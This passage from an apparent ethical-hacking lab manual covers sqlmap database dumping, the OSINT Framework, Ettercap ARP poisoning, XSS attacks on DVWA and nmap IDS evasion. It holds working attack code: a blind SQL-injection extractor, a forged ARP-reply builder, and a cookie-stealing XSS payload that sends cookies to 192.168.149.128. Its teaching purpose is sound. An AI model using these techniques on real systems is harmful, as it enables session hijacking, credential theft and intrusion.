We are interested in the acuart database. The other entry, information_schema, is not a table but the metadata database present on every MySQL server; it describes the structure of databases, tables and columns, which is useful on many occasions but is not the application data we are after. So we specify the database of interest with -D and ask sqlmap to list its tables with --tables:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables


Figure 4.4 step 4


Step 4: Columns

Now we specify the database with -D, the table with -T, and request the columns with --columns. The pattern should be clear by now. The most interesting table here is users, which is likely to contain the usernames and passwords of registered users of the site (attackers always look for sensitive data):

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users --columns


Figure 4.5 step 5


Step 5: Data

Now we will retrieve the data from multiple columns. As usual, we specify the database with -D, the table with -T, and the columns with -C, separating multiple column names with commas. We ask sqlmap to dump all rows of the specified columns using --dump. The final command will look like this:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump
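As an added illustration (this script is not part of the manual and is not sqlmap's own code), the following Python program reproduces, against a constructed in-memory SQLite database, the mechanics that steps 2 to 5 automate: a query that pastes the cat parameter straight into the SQL text, a boolean oracle ("did the product list stay non-empty?"), and a blind extraction loop that recovers table names and dumps a column one character at a time. This is what sqlmap's --tables, --columns and --dump do behind the screenshots. The table and user data are invented, and sqlite_master stands in for MySQL's information_schema. A parameterised version of the query is included to show the fix.

```python
import sqlite3
import string


# Constructed stand-in for the acuart schema: table names and rows are invented.
def build_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, cat INTEGER, name TEXT);
        CREATE TABLE users (name TEXT, email TEXT, pass TEXT);
        INSERT INTO products (cat, name) VALUES (1, 'poster'), (1, 'mug'), (2, 'shirt');
        INSERT INTO users VALUES ('admin', 'admin@example.test', 'changeme');
    """)
    return db


def list_products_vulnerable(db: sqlite3.Connection, cat: str) -> list:
    # Deliberately vulnerable: the cat parameter is concatenated into the SQL text,
    # the same bug sqlmap finds behind listproducts.php?cat=1
    sql = "SELECT name FROM products WHERE cat = " + cat
    return [row[0] for row in db.execute(sql)]


def list_products_fixed(db: sqlite3.Connection, cat: str) -> list:
    # Parameterised query: the value is bound as data and is never parsed as SQL
    try:
        cat_id = int(cat)
    except ValueError:
        return []
    return [row[0] for row in db.execute("SELECT name FROM products WHERE cat = ?", (cat_id,))]


CHARSET = string.ascii_lowercase + string.digits + "_@."


def oracle(db: sqlite3.Connection, condition: str) -> bool:
    # Boolean-based blind signal: the page "looks normal" (non-empty list)
    # only when the injected condition is true
    return bool(list_products_vulnerable(db, f"1 AND ({condition})"))


def blind_extract(db: sqlite3.Connection, subquery: str, max_len: int = 40) -> str:
    # Recover the scalar string returned by `subquery`, one position at a time,
    # by asking the oracle "is character N equal to X?" for each candidate X
    result = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            if oracle(db, f"substr(({subquery}), {pos}, 1) = '{ch}'"):
                result += ch
                break
        else:
            break  # no candidate matched: end of string (or NULL row)
    return result


def enumerate_tables(db: sqlite3.Connection) -> list:
    # Equivalent of sqlmap --tables: walk the catalogue (sqlite_master here,
    # information_schema.tables on MySQL) one row at a time
    tables = []
    while True:
        q = (f"SELECT name FROM sqlite_master WHERE type = 'table' "
             f"ORDER BY name LIMIT 1 OFFSET {len(tables)}")
        name = blind_extract(db, q)
        if not name:
            return tables
        tables.append(name)


def dump_column(db: sqlite3.Connection, table: str, column: str) -> list:
    # Equivalent of sqlmap -T table -C column --dump
    values = []
    while True:
        q = f"SELECT {column} FROM {table} ORDER BY rowid LIMIT 1 OFFSET {len(values)}"
        value = blind_extract(db, q)
        if not value:
            return values
        values.append(value)


if __name__ == "__main__":
    db = build_db()
    print("tables:", enumerate_tables(db))
    print("users.pass:", dump_column(db, "users", "pass"))
    print("fixed query fed '1 OR 1=1':", list_products_fixed(db, "1 OR 1=1"))
```

Every character recovered costs one request per candidate in CHARSET; sqlmap speeds this up with a binary search over the character code and by preferring error-based or UNION techniques when the page allows them, but the underlying oracle is the same.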


Figure 4.6 Output

4.7 Simulated Output


4.8 Conclusion:

…………………………………………………………………………………………
…………………………………………………………………………………………
…………………………………………………………………………………………
…………………………………………………………………………………………
…………………………………………………………………………………………
4.9 Questions:

1. Through ____________________ system, we can detect SQL Injection attacks.


2. To prevent the SQL Injection attack, we
should______________________________________________________________________
3. Inserting, updating and deleting data are all types of ________________________ attacks.
4. _______________________________ is a code injection technique that can cause loss of data from our database.


Experiment No. – 5

Date of Performance:

Date of Submission:

Program formation/ correction/ ethical practices (06) | Execution/ Viva (03) | Timely Submission (01) | Total (10) | Sign with Date

Experiment No. 5
OSINT Framework

5.1 Aim: To study the OSINT Framework and use it to gather publicly available information about a target.

5.2Course Outcome: Illustrate the various tools and techniques used by attackers to launch their
attacks.

5.3 Learning Objectives: Study of OSINT framework.

5.4 Requirement: Any type of web browser and Kali Linux

5.5 Related Theory:

OSINT Framework and its Functions:


The first phase of ethical hacking is reconnaissance, also known as footprinting or information gathering, in which we collect as much information about the target as possible. Open-source intelligence (OSINT) plays a critical role in obtaining information on the target, and the OSINT Framework plays an equally crucial role in finding the right sources for that information.

What is the OSINT Framework?
The OSINT Framework is a web-based collection of OSINT tools and resources, organised so that information about a target can be found more quickly and easily. It lets you browse tools for many themes and goals according to your requirements. The framework focuses on acquiring data through open-source tools and resources; it can be browsed by following the OSINT tree, and it provides an excellent classification of existing intelligence sources. Note that the framework is an index: most entries link to external sites and tools rather than performing a search themselves.

5.6 Procedure:

OSINT Framework Classification

The OSINT Framework can be accessed at:
https://osintframework.com/

On the right top corner of the screen, you can find indicators for some of the listed tools.
(T) — Indicates a link to a tool that must be installed and run locally
(D) — Google Dork (or Google Hacking)
(R) — Requires registration
(M) — Indicates a URL that contains the search term and the URL itself must be edited manually


Figure 5.1 OSINT Framework

Many categories are given in the shape of a tree in the above image, including email address,
username, domain name, IP address, social networks, and so on. When you click on any of the themes,
a sub-tree of useful resources appears.
So, if you’re looking for an email address, an IP address, or phone records, you can find them all in one
place, which is why the OSINT framework is so important for cybersecurity and information discovery.

Email address and IP address OSINT:


When you are searching for a breached email address, you can find many links to useful resources such as:
Have I Been Pwned?
Intelligence X
Vigilante.pw
Ashley Madison Emails, etc.
Similarly, if you are trying to analyse your network, then under IP Address > Network Analysis Tools you can find different tools to analyse the network, such as:
Wireshark
NetworkMiner
Packet Total
Network Total

Figure 5.2 Expanded view of OSINT Framework

Nmap is a port scanning program that can be used to identify open ports, closed ports and other information by sending probes to the target. The OSINT Framework also lists a number of search engines that let you find open ports without scanning the target yourself, because they index the results of Internet-wide scans that have already been carried out, such as:
ZoomEye
Scans.io
Shodan
Spyse
and many more.

Figure 5.3 Port discovery

Social Networking Platforms OSINT:


You can learn about social networking platforms such as Facebook, Twitter, Reddit, LinkedIn and others. You can locate Facebook and Twitter accounts, as well as a variety of other details. LinkedIn, on the other hand, does not make as much information available to the public. However, there are a few tools available, such as:
LinkedInt — LinkedIn Recon Tool
ScrapedIn
InSpy


Figure 5.4 Social Networking Platforms

Exploits and Advisories OSINT


Exploits and Advisories is another intriguing topic in the OSINT framework. Default passwords is an
area where you may search for various links to default password databases, lists, lookup utilities, and
so on.


Figure 5.5 Exploits and advisories

Dark Web OSINT


Do you want to explore the Dark Web? Under this heading you can find general information about the deep web, the dark web and onion services (including the relevant Reddit communities), and download links for the client software, such as Tor Download and the I2P Anonymous Network.
You can also find links to tools such as OnionScan, TorBot and TorScan. If you want to search on Tor, there are links to search engines such as Onion Cab, Onion Link and Candle, and to Tor directories such as the Hidden Wiki, Core.onion and Onion Tree. Other links in this branch include Tor2web, Web O Proxy and IACA Dark Web Investigation Support.


Figure 5.6 Dark web

Digital Currency OSINT


Information on Digital Currency such as Bitcoin, Ethereum and Monero can be found within OSINT
Framework.


Figure 5.7 Digital Currency

5.7 Simulated output:

5.8 Conclusion:

……………………………………………………………………………………………
……………………………………………………………………………………………
……………………………………………………………………………………………
……………………………………………………………………………………………

5.9 Questions:

1. Open-source intelligence (OSINT) involves gathering publicly accessible data from sources like:
____________________________________________________________________________________
____________________________________________________________________________________
2. The best OSINT tools include:
____________________________________________________________________________________
____________________________________________________________________________________
3. The OSINT framework can be used for:
____________________________________________________________________________________
____________________________________________________________________________________


Experiment No. – 6

Date of Performance:

Date of Submission:

Program formation/ correction/ ethical practices (06) | Execution/ Viva (03) | Timely Submission (01) | Total (10) | Sign with Date

Experiment No. 6
ARP poisoning Attack in Ettercap

6.1 Aim: To study and demonstrate an ARP poisoning attack using Ettercap.

6.2 Course Outcome: Identify cyber-attacks and its countermeasures.

6.3 Learning Objectives: Study of Ettercap framework in Kali Linux.

6.4 Requirement: Any type of web browser and Kali Linux

6.5 Related Theory:

ARP spoofing is an attack against an Ethernet or Wi-Fi network that places the attacker between the router and the target user. In an ARP-spoofing attack, frames meant for the target are delivered to the attacker instead, allowing the attacker to spy on, deny service to, or man-in-the-middle the target. One of the most popular tools for performing this attack is Ettercap, which comes preinstalled on Kali Linux.

On a normal network, frames are delivered over Ethernet or Wi-Fi by mapping the IP address that identifies a device to the MAC address of its network interface. A host learns that mapping through the Address Resolution Protocol (ARP): it broadcasts a request asking which device holds a given IP address, and the owner replies with its MAC address. Each host keeps the answers in its ARP cache and uses them to decide where to send traffic. ARP has no authentication, and most hosts also accept replies they never asked for, so the mapping can easily be spoofed to change where traffic is delivered.

In an ARP-spoofing attack, a program like Ettercap sends forged ARP replies that make nearby devices associate the attacker's MAC address with the IP address of the target (and, for a full man-in-the-middle, with the IP address of the gateway as well). When successful, the forged entries are stored in the ARP caches of the other hosts. If the rest of the network starts delivering packets intended for the target to the attacker instead, the attacker effectively controls the target's data connection.

Types of ARP Spoofing Attacks:


There can be three primary outcomes after an attacker gains initial success in poisoning
the ARP cache of other hosts on the network:

● The attacker can spy on traffic. They can lurk in the shadows, seeing everything that
the target user does on the network.
● The attacker can intercept and modify the packets in a man-in-the-middle attack.
They can intercept passwords typed into an HTTP website, see DNS requests, and
resolve IP addresses the target is navigating to in order to see what sites the target is
visiting. In a man-in-the-middle attack, the attacker has the opportunity not only to see
what's happening on the network but manipulate it as well. For instance, they can
attempt to downgrade the encryption the connection is using by deliberately requesting
insecure versions of webpages to make the attacker's job of sniffing passwords easier.
Also, a hacker can simply be a nuisance. For example, they can replace words in the
text of a website, flip or replace images, or modify other types of data flowing to and
from the target.
● The attacker can drop the packets meant for the target to create a denial-of-service attack. This is possibly the most frustrating to a target. While a Wi-Fi deauthentication attack is by far the more common way of knocking a client off a Wi-Fi network, ARP spoofing can be much harder to diagnose. If the attacker chooses not to forward the packets now being sent to it instead of the target, the target never receives them. The network is jammed from the inside: the attacker gets between the target and the router and then drops the packets flowing between them.
Ettercap Graphical
● One of the most intriguing programs installed by default in Kali Linux is Ettercap.
● Unlike many of the programs that are command-line only, Ettercap features a
graphical interface that's very beginner-friendly. While the results may sometimes
vary, Ettercap is an excellent tool for newbies to get the hang of network attacks like
ARP spoofing.

6.6 Procedure:

● If you don't already have Ettercap (for example, if you installed a light version of Kali), you can install it by typing the command shown in the figure below into a terminal window.


Figure 6.1 Installing Ettercap

Ettercap isn't the only tool for this, nor is it the most modern. Other tools, such as Bettercap, claim to
do what Ettercap does but more effectively. However, Ettercap proves useful enough to feature for
our demonstration. The general workflow of an Ettercap ARP spoofing attack is to join a network
you want to attack, locate hosts on the network, assign targets to a "targets" file, and then execute the
attack on the targets. Once we do all of that, we can figuratively watch over the target's shoulder as
they browse the internet, and we can even kill the connection from websites we want to steer them
away from. We can also run various payloads, like isolating a host from the rest of the network,
denying them service by dropping all packets sent to them, or running scripts to attempt to
downgrade the security of the connection.

Step1 -Connect to the Network


The first step of ARP spoofing is to connect to the network you want to attack. If you're
attacking an encrypted WEP, WPA, or WPA2 network, you'll need to know the password. This is
because we're attacking the network internally, so we need to be able to see some information about
the other hosts on the network and the data passing within it.
You can connect to a network for ARP spoofing in two ways. The first is to connect via Ethernet,
which is very effective but may not always be practical and is rarely subtle. Instead, many people
prefer to use a wireless network adapter and perform ARP spoofing over Wi-Fi.

Step 2 -Start Ettercap


In Kali, click on "Applications," then "Sniffing & Spoofing," followed by
"ettercap-graphical." Alternatively, click on the "Show Applications" option in the dock, then
search for and select "Ettercap."


Figure 6.2 Starting Ettercap

Once it starts up, you should find yourself on the Ettercap main screen. You'll see the
spooky Ettercap logo, and a few drop-down menus to start the attack from. In the next step, we'll
start exploring the "Sniff" menu.

Figure 6.3 Using Ettercap

At this point, make sure you have an active connection to the network before you continue.

Step 3-Select Network Interface to Sniff On


Click on the "Sniff" menu item, and then select "Unified sniffing." A new window will
open asking you to select which network interface you want to sniff on. You should select the
network interface that is currently connected to the network you're attacking.

Figure 6.4 Using Ettercap

Now, you'll see some text confirming that sniffing has started, and you'll be able to access more
advanced menu options such as Targets, Hosts, Mitm, Plugins, etc. Before we get started using any
of them, we'll need to identify our target on the network.

Figure 6.5 Identify targets

Step 4-Identify Hosts on a Network

To find the device we want to attack on the network, Ettercap has a few tricks up
its sleeve.
First, we can do a simple scan for hosts by clicking "Hosts," then "Scan for hosts."
A scan will execute, and after it finishes, you can see the resulting hosts Ettercap has
identified on the network by clicking "Hosts," then "Hosts list."

Figure 6.6 Identify Hosts on a Network

We can now see a list of targets we've discovered on the network. Want to see what they're doing
or narrow down the targets? Click on "View," then "Connections" to start snooping on connections.
Once in the Connections view, you can filter the connections by IP address, type of connection,
and whether the connection is open, closed, active, or killed. This gives you a lot of snooping
power, which can be augmented by clicking the "View," then "Resolve IP addresses."

This means Ettercap will try to resolve the IP addresses it sees other devices on the network
connecting to. If you want to identify a target on a network and know what they're browsing, look
over their shoulder at what website they're on, and match the website to an IP address with an
active connection to the same website. Otherwise, you can usually tell by the MAC address, as you
can look it up online to see the manufacturer.


Figure 6.7 Identify Hosts on a Network

Step 5 -Select Hosts to Target with ARP Spoofing


Now that we've identified our target's IP address, it's time to add them to a target list.
Once we do this, we'll be telling Ettercap that we want to designate that IP address as one we want
to pretend to be, so that we're receiving messages from the router that were meant to be sent to the
target.
Go back to the "Hosts" screen, and select the IP address of the target you want to target.
Click the IP address to highlight it, and then click on "Targets," followed by "Target list," to see a
list of devices that have been targeted for ARP spoofing.

Figure 6.8 Select Hosts to Target with ARP Spoofing


Now, we can go to the "Mitm" menu to start our attack on this target.
Step 6-Launch Attack on Targets
Click on the "Mitm" menu, and select "ARP poisoning." A popup will open, and you'll
select "Sniff remote connections" to begin the sniffing attack.

Figure 6.9 Launch Attack on Targets

Once this attack has begun, you'll be able to intercept login credentials if the user you're targeting
enters them into a website that doesn't use HTTPS. This could be a router or a device on the
network or even a website that uses poor security.

To try another attack, you can click on "Plugins," then "Load plugins," to show the plugin menu.
If you select the DOS attack, it will begin dropping the packets sent to this target, cutting off their
internet access.


Figure 6.10 Launch Attack on Targets

Step 7-Try Intercepting a Password


Now, let's actually try intercepting a password. A website that is useful for testing is aavtrain.com, which deliberately uses plain HTTP so that you can intercept credentials. On the target device, navigate to aavtrain.com. Once it loads, you'll see a login screen you can enter a fake login and password into.

Figure 6.11 Intercepting a Password

Enter a username and password, and then hit "Submit." If Ettercap is successful, you should see the
login and password you typed appear on the attacker's screen


Figure 6.12 Intercepting a Password

In this result above, we can see that Ettercap successfully ARP poisoned the target and intercepted
an HTTP login request the target was sending to an insecure website.

ARP Poisoning Is a Powerful Tool with Some Limitations


The major obvious limitation of ARP spoofing is that it only works from inside the target's local network segment: the attacker must already be connected to the same Ethernet or Wi-Fi network, because ARP never crosses a router. It works well on open or shared networks, but may not work against networks with more sophisticated monitoring (such as dynamic ARP inspection on managed switches, or ARP-watching tools that flag an IP address changing its MAC) that can detect this sort of behaviour.
ARP spoofing attacks are another example of why it is essential to pick strong passwords for your networks and limit access to those you trust. You give away a lot of trust when you give someone your network password or an Ethernet connection, so choose your passwords carefully and be careful who you share them with.
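As an added example (not part of the manual and not Ettercap's own code), the following Python builds the kind of forged ARP reply Ettercap sends in Step 6 (attacker MAC, someone else's IP, no authentication anywhere in the frame) and pairs it with a small arpwatch-style detector of the sort mentioned under the limitations above: it remembers the first MAC seen for each IP, raises an alert when an IP is later claimed by a different MAC, and reports any MAC that ends up behind more than one IP, which is exactly what an attacker poisoning both the gateway and the victim looks like. The MAC and IP addresses are constructed; on a real network the frames would come from a packet capture.

```python
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    # Ethernet header (14 bytes): destination MAC, source MAC, EtherType 0x0806
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # ARP header (RFC 826): htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    # Sender/target hardware and protocol addresses. A poisoned reply simply puts the
    # attacker's MAC next to somebody else's IP here; nothing in the frame authenticates it.
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip) + mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    fmt_mac = lambda b: ":".join(f"{x:02x}" for x in b)
    fmt_ip = lambda b: ".".join(str(x) for x in b)
    return {
        "op": struct.unpack("!H", frame[20:22])[0],
        "sender_mac": fmt_mac(frame[22:28]),
        "sender_ip": fmt_ip(frame[28:32]),
        "target_mac": fmt_mac(frame[32:38]),
        "target_ip": fmt_ip(frame[38:42]),
    }


class ArpWatch:
    """Minimal arpwatch-style detector: records every MAC that has claimed each IP
    and flags a reply that claims an already-known IP with a new MAC."""

    def __init__(self):
        self.seen = {}  # ip -> [mac, ...] in order of first appearance

    def observe(self, frame: bytes):
        pkt = parse_arp(frame)
        if pkt["op"] != ARP_REPLY:
            return None
        ip, mac = pkt["sender_ip"], pkt["sender_mac"]
        macs = self.seen.setdefault(ip, [])
        if mac in macs:
            return None
        macs.append(mac)
        if len(macs) > 1:
            return f"ALERT: {ip} was {macs[0]}, now claimed by {mac} (possible ARP poisoning)"
        return None

    def macs_claiming_multiple_ips(self) -> dict:
        # A man-in-the-middle claims both the gateway's and the victim's IP
        by_mac = {}
        for ip, macs in self.seen.items():
            for mac in macs:
                by_mac.setdefault(mac, []).append(ip)
        return {m: ips for m, ips in by_mac.items() if len(ips) > 1}


def simulate_poisoning():
    # Constructed scenario: gateway .1, victim .20, attacker with its own MAC
    gw_mac, gw_ip = "00:11:22:33:44:01", "192.168.1.1"
    victim_mac, victim_ip = "00:11:22:33:44:02", "192.168.1.20"
    attacker_mac = "de:ad:be:ef:00:01"
    frames = [
        build_arp_reply(gw_mac, gw_ip, victim_mac, victim_ip),        # legitimate
        build_arp_reply(victim_mac, victim_ip, gw_mac, gw_ip),        # legitimate
        build_arp_reply(attacker_mac, gw_ip, victim_mac, victim_ip),  # "I am the gateway"
        build_arp_reply(attacker_mac, victim_ip, gw_mac, gw_ip),      # "I am the victim"
    ]
    watch = ArpWatch()
    alerts = [a for a in map(watch.observe, frames) if a]
    return alerts, watch.macs_claiming_multiple_ips()


if __name__ == "__main__":
    for line in simulate_poisoning()[0]:
        print(line)
```

A detector like this only sees what the monitoring host's interface sees, so on a switched network it must run on a mirror port or on the hosts themselves; it also cannot tell a legitimate NIC replacement from an attack, which is why it raises an alert rather than blocking anything.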

6.7 Simulated output:


6.8 Conclusion:

…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………
…………………………………………………………………………………………………………

6.9 Questions:

1. In an ARP-spoofing attack, a program like Ettercap will send spoofed messages attempting to
get nearby devices to associate the hacker's ___________address with the _________address of the
target.
2. The major obvious limitation of ARP spoofing is
_________________________________________________________________________________
3. ___________________________ is a technique where the attacker sends Malicious ARP
Packets to the default gateway and to the host who is communicating with the default gateway in the
local area network.


Experiment No. – 7

Date of Performance:

Date of Submission:

Program formation/ correction/ ethical practices (06) | Execution/ Viva (03) | Timely Submission (01) | Total (10) | Sign with Date

Experiment No. 7
Cross-site scripting attack

7.1Aim: To demonstrate cross-site scripting attack.

7.2 Course Outcome: Identify cyber-attacks and its countermeasures.

7.3 Learning Objectives: Study of the Cross-Site Scripting (XSS) vulnerability in web applications.

7.4 Requirement: Any type of web browser and Kali Linux

7.5 Related Theory:

Cross-Site Scripting (XSS) is a vulnerability in web applications and also the name of a client-side
attack in which the attacker injects and runs a malicious script into a legitimate web page. Browsers
are capable of displaying HTML and executing JavaScript. If the application does not escape special
characters in the input/output and reflects user input as-is back to the browser, an adversary may be
able to launch a Cross-Site Scripting (XSS) attack successfully. You can find more information about
this vulnerability in OWASP’s Cross-Site Scripting page. For demo purposes, we will use the
well-known DVWA application, which we have installed locally.

The DVWA page http://localhost:81/DVWA/vulnerabilities/xss_r/ is affected by a reflected XSS in the name parameter. This can be seen in the figure below when we inject the JavaScript code <script>alert(123)</script>, which is reflected and executed in the response page.

Figure 7.1 DVWA page


7.6 Procedure:

XSS Attack 1: Hijacking the user’s session

Most web applications maintain user sessions in order to identify the user across multiple HTTP
requests. Sessions are identified by session cookies.
For example, after a successful login to an application, the server will send you a session cookie by
the Set-Cookie header. Now, if you want to access any page in the application or submit a form, the
cookie (which is now stored in the browser) will also be included in all the requests sent to the
server. This way, the server will know who you are.
Thus, session cookies are sensitive information which, if compromised, may allow an attacker to
impersonate the legitimate user and gain access to his existing web session. This attack is called
session hijacking.
JavaScript code running in the browser can read the session cookies (when they lack the HttpOnly flag) through document.cookie. So, if we inject the following payload into the name parameter, the vulnerable page shows the current cookie value in an alert box:


Figure 7.2 DVWA page

Now, in order to steal the cookies, we have to provide a payload which will send the cookie value to
the attacker-controlled website.
The following payload creates a new Image object in the DOM of the current page and sets the src
attribute to the attacker’s website. As a result, the browser will make an HTTP request to this
external website (192.168.149.128) and the URL will contain the session cookie.

So here is the attack URL which will send the cookies to our server:

When the browser receives this request, it executes the JavaScript payload, which makes a new
request to 192.168.149.128, along with the cookie value in the URL, as shown below.


If we listen for an incoming connection on the attacker-controlled server (192.168.149.128), we can see an incoming request with the cookie values (security and PHPSESSID) appended to the URL. The same information can be found in the access.log file on the server.

Figure 7.3 Incoming request with cookie values

Using the stolen cookie:


With the above cookie information, if we access any internal page of the application and append the
cookie value in the request, we can access the page on behalf of the victim, in its own session
(without knowing the username and password). Basically, we have hijacked the user’s session.


Figure 7.4 Incoming request with cookie values


Figure 7.4 XSS in DVWA


The HttpOnly cookie attribute mitigates this scenario by preventing JavaScript from reading the cookie value. It is set when the cookie is issued (via the Set-Cookie header).

XSS Attack 2: Perform unauthorized activities

If the HttpOnly cookie attribute is set, we cannot steal the cookies through JavaScript. However, using the XSS attack, we can still perform unauthorized actions inside the application on behalf of the user, because the browser attaches the session cookie to any request the injected script makes to the same origin.
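As an added example (not from the manual, and not DVWA's own code), the following Python puts the pieces of Attack 1 and its mitigation side by side, where they can be run offline: the reflection bug and its output-encoding fix, the Image-based cookie-stealing payload and the encoded link a victim would be sent, a parser that pulls the exfiltrated cookies back out of the attacker's access.log, and a check for the HttpOnly attribute on Set-Cookie. The DVWA URL and attacker address are the ones used above; the access.log line is constructed.

```python
import html
import re
from urllib.parse import quote, unquote

DVWA_XSS_URL = "http://localhost:81/DVWA/vulnerabilities/xss_r/"  # vulnerable page from the manual
ATTACKER_URL = "http://192.168.149.128/"                           # attacker host from the manual


def render_vulnerable(name: str) -> str:
    # DVWA 'low' security: the name parameter is reflected into the HTML unchanged
    return f"<pre>Hello {name}</pre>"


def render_fixed(name: str) -> str:
    # Output encoding: <, >, &, " and ' become entities, so the browser shows
    # the payload as text instead of executing it
    return f"<pre>Hello {html.escape(name, quote=True)}</pre>"


def cookie_stealer_payload(attacker_url: str = ATTACKER_URL) -> str:
    # Image-object exfiltration from Attack 1: the browser fetches the "image" from
    # the attacker's server and hands over document.cookie in the query string
    return f'<script>new Image().src="{attacker_url}?c="+document.cookie;</script>'


def attack_url(payload: str, page: str = DVWA_XSS_URL) -> str:
    # The link a victim is tricked into opening; quote() URL-encodes the payload
    return f"{page}?name={quote(payload, safe='')}"


def cookies_from_access_log(line: str) -> dict:
    # Recover the exfiltrated cookies from an Apache-style access.log entry on the
    # attacker's server. The browser percent-encodes the space after each ';'.
    m = re.search(r'"GET (\S+) HTTP/', line)
    if not m or "?" not in m.group(1):
        return {}
    query = m.group(1).split("?", 1)[1]
    raw = ""
    for kv in query.split("&"):
        if kv.startswith("c="):
            raw = unquote(kv[2:])
    cookies = {}
    for pair in raw.split(";"):
        if "=" in pair:
            key, value = pair.strip().split("=", 1)
            cookies[key] = value
    return cookies


def set_cookie_is_httponly(header_value: str) -> bool:
    # Mitigation check: does the Set-Cookie header carry the HttpOnly attribute?
    attrs = {a.strip().lower() for a in header_value.split(";")[1:]}
    return "httponly" in attrs


if __name__ == "__main__":
    probe = "<script>alert(123)</script>"
    print(render_vulnerable(probe))
    print(render_fixed(probe))
    print(attack_url(cookie_stealer_payload()))
```

HttpOnly stops this particular payload but not the ones in the following attacks, which never need to read the cookie; output encoding (render_fixed) is the fix that removes the injection itself.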

For instance, in this attack scenario, we will post a new message in the Guestbook on behalf of the victim user, without their consent. For this, we need to forge an HTTP POST request to the Guestbook page with the appropriate parameters using JavaScript.
The following payload does this by creating an XMLHttpRequest object and setting the necessary header and data:

This is how the request looks in the browser and also when intercepted in Burp.


Figure 7.5 XSS Attack 2

The script on execution will generate a new request to add a comment on behalf of the user.


Figure 7.6 XSS Attack 2

XSS Attack 3: Phishing to steal user credentials


XSS can also be used to inject a form into the vulnerable page and use this form to collect user
credentials. This type of attack is called phishing.
The payload below will inject a form with the message Please login to proceed, along with username
and password input fields.

When accessing the link below, the victim may enter their credentials in the injected form. Note that we can modify the payload to make it look like a legitimate form as needed.

Once the user enters their credentials and clicks on the Logon button, the request is sent to the
attacker-controlled server. The request can be seen in the screenshots below:

Figure 7.7 XSS Attack 3

The credentials entered by the user (pentest: pentest) can be seen on the receiving server.


XSS Attack 4: Capture the keystrokes by injecting a keylogger


In this attack scenario, we will inject a JavaScript keylogger into the vulnerable web page and we
will capture all the keystrokes of the user within the current page.
First of all, we will create a separate JavaScript file and we will host it on the attacker-controlled
server. We need this file because the payload is too big to be inserted in the URL and we avoid
encoding and escaping errors. The JavaScript file contains the following code:

On every keypress, a new XMLHttpRequest is generated and sent to the keylog.php page hosted on the attacker-controlled server. The code in keylog.php writes the value of the pressed key into a file called data.txt.


Now we need to call the vulnerable page with the payload from our server:

Figure 7.8 XSS Attack 4


Once the script is loaded on the page, a new request is fired with every stroke of any key.

The value of the parameter key is being written to the data.txt file, as shown in the screenshot below.


Figure 7.9 XSS Attack 4

XSS Attack 5: Stealing sensitive information


Another malicious activity that can be performed with an XSS attack is stealing sensitive
information from the user’s current session. Imagine that an internet banking application is
vulnerable to XSS, the attacker could read the current balance, transaction information, personal
data, etc.
For this scenario, we need to create a JavaScript file on the attacker-controlled server. The file
contains logic that takes a screenshot of the page where the script is running:

Then we need to create a PHP file on the attacker’s server, which saves the content of the png
parameter into the test.png file.


Now we inject the JavaScript code into the vulnerable page by tricking the user to access the
following URL:

Once the JavaScript file is loaded, the script sends the data in base64 format to the saveshot.php file
which writes the data into the test.png file. On opening the test.png file, we can see the screen
capture of the vulnerable page.

Figure 7.10 XSS Attack 5

Another way
Another way to steal the page content would be to get the HTML source code by using
getElementById. Here is a payload that gets the innerHTML of the guestbook_comments element
and sends it to the attacker.


Figure 7.11 XSS Attack 5

We can also fetch the entire page source of the page by using the following payload:

Figure 7.12 XSS Attack 5


Figure 7.13 XSS Attack 5

Decoding the received data in the Burp Decoder gives us the cleartext page source of the vulnerable
page. Here, we can see the Guestbook comments.

Figure 7.14 Burp suite


7.7 Simulated output:

7.8 Conclusion:

…………………………………………………………………………………………
…………………………………………………………………………………………
…………………………………………………………………………………………
…………………………………………………………………………………………

7.9 Questions:

1. ________________ vulnerability allows an attacker to compromise the interactions that users
have with a vulnerable application.
2. XSS works by exploiting a vulnerability in _____________, which results in it returning
malicious JavaScript code when users visit it.
3. Types of XSS attacks are:
______________________________________________________________________________
______________________________________________________________________________


Experiment No. – 8

Date of Performance:

Date of Submission:

Program formation/ correction/ ethical practices (06) | Execution/ Viva (03) | Timely Submission (01) | Total (10) | Sign with Date

Experiment No. 8
IDS and firewalls

8.1 Aim: Study the behaviour of protections such as IDS and firewalls when altering headers in
network packets.
8.2 Course Outcome: Identify various web application and network vulnerability scanning
techniques and defence methodologies.
8.3 Learning Objectives: Study of IDS and firewall behaviour using Wireshark.

8.4 Requirement: Kali Linux

8.5 Related Theory:

1. By fragmenting the packets with 8 bytes of data:

Fragment packets, optionally with a given MTU. If the firewall or the IDS/IPS does not reassemble the
packet, it will most likely let it pass; the target system, however, will reassemble and process it.
Command: nmap -sS -Pn -f -F 10.10.179.150


Figure 8.1 Wireshark to capture packets


If you limit the IP data to 8 bytes, the 24 bytes of the TCP header will be divided across 3 IP
packets.
2. Generate IP packets with a specific length.
In some instances, you might find that the size of the packets is triggering the firewall or the
IDS/IPS to detect and block you. If you find yourself in such a situation, you can make your port
scanning more evasive by setting a specific length. You can set the length of data carried within the IP
packet using --data-length VALUE. Again, remember that the length should be a multiple of 8.

If you run the Nmap scan nmap -sS -Pn --data-length 64 -F 10.10.179.150, each TCP segment
will be padded with random data until its length is 64 bytes. In the screenshot below, we can see that each
